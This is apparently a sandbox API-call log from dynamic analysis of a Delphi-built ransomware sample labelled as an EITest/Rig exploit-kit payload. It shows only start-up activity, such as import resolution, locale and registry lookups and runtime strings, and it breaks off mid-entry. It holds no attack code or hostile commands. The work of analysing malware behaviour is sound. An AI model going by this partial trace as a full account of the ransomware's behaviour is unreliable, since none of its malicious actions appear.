[0090.857] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0090.857] GetProcAddress (hModule=0x769f0000, 
lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0090.857] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76750000 [0090.857] GetProcAddress (hModule=0x76750000, lpProcName="CoTaskMemFree") returned 0x767a6f41 [0090.857] GetProcAddress (hModule=0x76750000, lpProcName="StringFromCLSID") returned 0x7676eb17 [0090.857] GetProcAddress (hModule=0x76750000, lpProcName="CoCreateInstance") returned 0x76799d0b [0090.857] GetProcAddress (hModule=0x76750000, lpProcName="CoUninitialize") returned 0x767986d3 [0090.858] GetProcAddress (hModule=0x76750000, lpProcName="CoInitialize") returned 0x7676b636 [0090.858] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0090.858] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayPtrOfIndex") returned 0x76c2e1ce [0090.858] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetUBound") returned 0x76c2e127 [0090.858] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayGetLBound") returned 0x76c2e173 [0090.858] GetProcAddress (hModule=0x76c10000, lpProcName="SafeArrayCreate") returned 0x76c2e263 [0090.858] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeType") returned 0x76c15dee [0090.858] GetProcAddress (hModule=0x76c10000, lpProcName="VariantCopy") returned 0x76c148f1 [0090.858] GetProcAddress (hModule=0x76c10000, lpProcName="VariantClear") returned 0x76c13eae [0090.858] GetProcAddress (hModule=0x76c10000, lpProcName="VariantInit") returned 0x76c13ed5 [0090.858] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0090.858] GetProcAddress (hModule=0x76c10000, lpProcName="GetErrorInfo") returned 0x76c13f21 [0090.858] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0090.858] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0090.858] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0090.858] GetProcAddress (hModule=0x76c10000, lpProcName="SysReAllocStringLen") returned 0x76c17810 
[0090.858] GetProcAddress (hModule=0x76c10000, lpProcName="SysAllocStringLen") returned 0x76c145d2 [0090.858] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75830000 [0090.858] GetProcAddress (hModule=0x75830000, lpProcName="SHGetSpecialFolderPathW") returned 0x75850468 [0090.858] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0090.859] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0090.859] GetProcAddress (hModule=0x76b40000, lpProcName="CharNextW") returned 0x76b50be6 [0090.859] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0090.859] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0090.859] GetProcAddress (hModule=0x76b40000, lpProcName="PeekMessageW") returned 0x76b5634a [0090.859] GetProcAddress (hModule=0x76b40000, lpProcName="MsgWaitForMultipleObjects") returned 0x76b537d8 [0090.859] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxW") returned 0x76b9ea5f [0090.859] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0090.859] GetProcAddress (hModule=0x76b40000, lpProcName="GetSystemMetrics") returned 0x76b567cf [0090.859] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperBuffW") returned 0x76b5ebd5 [0090.859] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperW") returned 0x76b5e981 [0090.859] GetProcAddress (hModule=0x76b40000, lpProcName="CharLowerBuffW") returned 0x76b53afe [0090.859] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x40) returned 1 [0090.859] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x4) returned 1 [0090.859] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0090.859] SetThreadLocale (Locale=0x400) returned 1 [0090.867] GetVersion () returned 0x1db10106 [0090.867] GetModuleHandleW 
(lpModuleName="kernel32.dll") returned 0x76910000 [0090.867] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPreferredUILanguages") returned 0x769522d7 [0090.867] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0090.867] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPreferredUILanguages") returned 0x7694e627 [0090.867] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0090.867] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadUILanguage") returned 0x7694ae42 [0090.867] GetSystemInfo (in: lpSystemInfo=0x12fc34 | out: lpSystemInfo=0x12fc34*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.867] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe\" " [0090.867] GetStartupInfoW (in: lpStartupInfo=0x12fc10 | out: lpStartupInfo=0x12fc10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x200202, hStdError=0x1f80)) [0090.867] GetACP () returned 0x4e4 [0090.867] GetCurrentThreadId () returned 0xa8c [0090.867] GetVersion () returned 0x1db10106 [0090.867] GetVersionExW (in: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7728f879, dwMinorVersion=0x7728f99a, dwBuildNumber=0x2f1c78, dwPlatformId=0x12fbaa, szCSDVersion="") | out: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, 
dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.868] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x12da00, nSize=0x20a | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe" (normalized: "c:\\users\\eebsym5\\desktop\\2017-04-03-eitest-rig-ek-payload-matrix-ransomware-variant.exe")) returned 0x57 [0090.868] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12d7ea, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe" (normalized: "c:\\users\\eebsym5\\desktop\\2017-04-03-eitest-rig-ek-payload-matrix-ransomware-variant.exe")) returned 0x57 [0090.868] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1300000 [0090.868] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0090.868] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0090.868] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0090.868] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0090.868] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0090.868] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0090.868] GetUserDefaultUILanguage () returned 0x409 
[0090.869] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0090.869] GetThreadUILanguage () returned 0x120409 [0090.869] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768) returned 1 [0090.869] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x14319b0, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x14319b0, pcchLanguagesBuffer=0x12d768) returned 1 [0090.870] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.en-US", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0090.870] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.en", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0090.870] GetUserDefaultUILanguage () returned 0x409 [0090.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x12d784, cchData=4 | out: lpLCData="ENU") returned 4 [0090.870] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.ENU", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0090.870] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.EN", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0090.870] LoadStringW (in: hInstance=0x400000, uID=0xffc7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffc6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0090.871] LoadStringW (in: hInstance=0x400000, 
uID=0xffc5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffc4, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffc3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe 
[0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0090.871] LoadStringW (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0090.871] GetVersionExW 
(in: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.871] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0090.872] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x304400 [0090.872] GetProcAddress (hModule=0x76910000, lpProcName="GetNativeSystemInfo") returned 0x7694be77 [0090.872] GetNativeSystemInfo (in: lpSystemInfo=0x12fb1c | out: lpSystemInfo=0x12fb1c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0090.872] LoadStringW (in: hInstance=0x400000, uID=0xff68, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0090.872] LoadStringW (in: hInstance=0x400000, uID=0xff6b, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9 [0090.872] LoadStringW (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0090.872] LoadStringW (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0090.872] LoadStringW (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0090.872] LoadStringW (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0090.872] LoadStringW (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 
0x13 [0090.872] LoadStringW (in: hInstance=0x400000, uID=0xff85, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16 [0090.872] LoadStringW (in: hInstance=0x400000, uID=0xff7d, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20 [0090.872] GetVersionExW (in: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x5e030006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0090.872] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0090.872] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0090.872] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x13f80dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19 [0090.872] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceExW") returned 0x7694de40 [0090.872] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa0a, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe" (normalized: "c:\\users\\eebsym5\\desktop\\2017-04-03-eitest-rig-ek-payload-matrix-ransomware-variant.exe")) returned 0x57 [0090.872] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0090.872] RegOpenKeyExW (in: hKey=0x80000002, 
lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0090.872] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0090.872] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0090.872] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0090.872] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0090.872] GetThreadLocale () returned 0x409 [0090.872] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x12fb50 | out: lpCPInfo=0x12fb50) returned 1 [0090.872] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0090.873] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0090.873] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0090.873] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0090.873] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x304410 [0090.873] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0090.873] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x12fab0 | out: Buffer=0x0, ReturnedLength=0x12fab0) returned 0 [0090.873] GetLastError () returned 0x7a [0090.873] GetLogicalProcessorInformation (in: Buffer=0x13e99d0, ReturnedLength=0x12fab0 | out: Buffer=0x13e99d0, ReturnedLength=0x12fab0) returned 1 [0090.873] GetCurrentThreadId () returned 0xa8c [0090.873] GetCurrentThreadId () returned 0xa8c [0090.873] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x100b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="2") returned 2 [0090.873] GetThreadLocale () returned 0x409 [0090.873] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0090.874] GetThreadLocale () returned 0x409 [0090.874] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0090.874] GetCurrentThreadId () returned 0xa8c [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sun") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sunday") returned 7 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Mon") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Monday") returned 7 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tue") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tuesday") returned 8 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wed") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wednesday") returned 10 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thu") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thursday") returned 9 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Fri") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Friday") returned 7 [0090.874] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x36, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sat") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Saturday") returned 9 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jan") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="January") returned 8 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Feb") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="February") returned 9 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Mar") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="March") returned 6 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Apr") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="April") returned 6 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jun") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="June") returned 5 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jul") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="July") returned 5 [0090.874] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x4b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Aug") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="August") returned 7 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Sep") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="September") returned 10 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Oct") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="October") returned 8 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Nov") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="November") returned 9 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Dec") returned 4 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="December") returned 9 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f908, cchData=256 | out: lpLCData="$") returned 2 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fb00, cchData=2 | out: lpLCData=".") returned 2 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f908, cchData=256 | out: lpLCData="2") returned 2 [0090.874] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, 
